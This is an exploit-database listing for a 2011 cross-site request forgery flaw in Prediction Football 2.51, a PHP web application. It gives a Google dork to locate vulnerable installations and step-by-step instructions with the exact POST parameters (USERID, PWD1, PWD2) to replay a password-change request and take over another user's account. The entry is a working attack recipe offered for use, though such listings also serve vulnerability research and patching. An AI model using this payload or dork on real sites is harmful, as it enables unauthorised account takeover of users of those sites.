[] NeoSense
E X P L O I T S
title author type platform port cve id

Prediction Football 2.51 - Cross-Site Request Forgery

Author: Smith Falcon
type: webapps
platform: php
port: 
date_added: 2011-08-14 
date_updated: 2011-08-14 
verified: 0 
codes: OSVDB-74536 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: [title]
# Google Dork: [if relevant]  intext:"Prediction football 2.51"
# Date: 08/08/2011
# Author: Smith Falcon
# Software Link: http://www.predictionfootball.com/download/download.html
# Version: 2.51
# Tested on: Linux

First create a username and go to Account Profile

The POST variable in index.php?cmd=changepass is vulnerable to CSRF

Grab Header Information with HTTP Live headers and replay the POST VARIABLE

&OLDPWD=anything&USERID=[id of user u want pwd
changed]&PWD1=[newpass]&PWD2=[newpass]&ChangePwd=Change+Password

REPLAY with new password of the userid and logout!
Now you can login with that desired user and password!
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.